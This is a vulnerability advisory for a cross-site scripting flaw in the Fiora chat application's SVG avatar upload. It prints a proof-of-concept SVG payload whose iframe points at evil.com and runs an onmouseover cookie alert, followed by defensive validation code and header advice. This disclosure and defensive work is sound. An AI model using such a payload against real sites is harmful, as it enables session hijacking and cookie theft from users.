# CVE-2025-56515: Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application
## Vulnerability Overview
- **CVE ID**: CVE-2025-56515
- **Vulnerability Type**: Cross-Site Scripting (XSS)
- **Attack Type**: Remote
- **Impact**: Code Execution
- **Affected Product**: Fiora Chat Application (Version 1.0.0)
- **Vendor**: suisuijiang
- **Discoverer**: Kaio Mendonça Pereira
- **Vendor Confirmed**: Yes
- **References**:
  - [Fiora GitHub Repository](https://github.com/yinxin630/fiora)
  - [Fiora Application](https://fiora.suisuijiang.com/)
  - [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
## Description
The Fiora chat application (version 1.0.0) is vulnerable to a Cross-Site Scripting (XSS) attack due to improper validation of SVG file content uploaded through the user avatar modification functionality. Authenticated users can upload malicious SVG files containing embedded `<foreignObject>` elements with `<iframe>` tags and JavaScript event handlers (e.g., `onmouseover`). When these SVG files are rendered in the browser, the embedded JavaScript executes, allowing attackers to steal user sessions, cookies, or perform unauthorized actions in the context of users viewing the affected profile.
## Affected Components
- `packages/server/src/routes/user.ts`
- `packages/web/src/modules/Sidebar/UserInfo.tsx`
- `packages/web/src/service.ts`
- `packages/web/src/components/Avatar.tsx`
- `/UserAvatar/` directory
- Function: `changeUserAvatar`
## Attack Vector
The vulnerability is exploited by uploading a malicious SVG file as a user avatar. The SVG file can include a `<foreignObject>` element containing an `<iframe>` with a JavaScript event handler, such as `onmouseover="alert(document.cookie)"`. When the avatar is rendered (e.g., on page reload or direct access to the SVG URL), the malicious JavaScript executes, bypassing the application's XSS protections. This enables attackers to perform actions such as:
- Stealing session cookies.
- Performing unauthorized actions in the context of the victim's session.
- Redirecting users to malicious sites.
### Example Malicious SVG Payload
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<foreignObject x="0" y="0" width="100" height="100">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
</foreignObject>
<text x="0" y="15"></text>
</svg>
```
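A server-side check of the kind that closes this vector, added here as an example and not taken from Fiora's code base (the function names, the magic-byte table and the sample payload string are constructed for illustration): avatars are accepted only when their bytes sniff as an allowlisted raster format, so an `image/svg+xml` upload is rejected regardless of declared MIME type or extension, and a second helper flags the constructs this advisory relies on for cases where SVG must be inspected.

```javascript
// Added defensive example (not Fiora's own code). Two layers:
//  1. allowlist raster formats by magic bytes, so SVG never becomes an avatar;
//  2. a detector for active SVG content (foreignObject, iframe, on* handlers,
//     script, javascript: URLs) for any path that still has to inspect SVG.
//     It is a heuristic; a real sanitizer should be used where SVG is allowed.
const MAGIC = [ // constructed allowlist: PNG, JPEG, GIF signatures
  { type: 'image/png',  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: 'image/jpeg', bytes: [0xff, 0xd8, 0xff] },
  { type: 'image/gif',  bytes: [0x47, 0x49, 0x46, 0x38] },
];

// Returns the sniffed MIME type for an allowlisted raster image, else null.
// SVG is text (it starts with '<' or a BOM), so it always falls through to null.
function sniffRasterType(buf) {
  for (const { type, bytes } of MAGIC) {
    if (buf.length >= bytes.length && bytes.every((b, i) => buf[i] === b)) return type;
  }
  return null;
}

// Returns the names of the dangerous constructs found in an SVG document.
function findActiveSvgContent(svgText) {
  const checks = [
    ['script element',  /<\s*script\b/i],
    ['foreignObject',   /<\s*foreignObject\b/i],
    ['iframe',          /<\s*iframe\b/i],
    ['event handler',   /\son[a-z]+\s*=/i],
    ['javascript: URL', /(?:href|src)\s*=\s*["']?\s*javascript:/i],
  ];
  return checks.filter(([, re]) => re.test(svgText)).map(([name]) => name);
}

// Decision for the avatar upload route: the sniffed type must be an allowlisted
// raster format and must agree with the declared MIME type.
function validateAvatarUpload(buf, declaredMime) {
  const sniffed = sniffRasterType(buf);
  if (!sniffed) return { ok: false, reason: 'not an allowed raster image' };
  if (sniffed !== declaredMime) return { ok: false, reason: 'declared type mismatch' };
  return { ok: true, type: sniffed };
}

// Constructed sample modelled on the payload above (no remote src, harmless handler).
const SAMPLE_PAYLOAD = '<svg xmlns="http://www.w3.org/2000/svg"><foreignObject>' +
  '<iframe xmlns="http://www.w3.org/1999/xhtml" onmouseover="alert(1)"></iframe>' +
  '</foreignObject></svg>';

console.log(validateAvatarUpload(Buffer.from(SAMPLE_PAYLOAD), 'image/svg+xml'));
console.log(findActiveSvgContent(SAMPLE_PAYLOAD));
```

Serving the `/UserAvatar/` directory with `Content-Disposition: attachment` and a restrictive `Content-Security-Policy` on those responses is a complementary control, since it stops a direct visit to the SVG URL from executing script even if a file slips past validation.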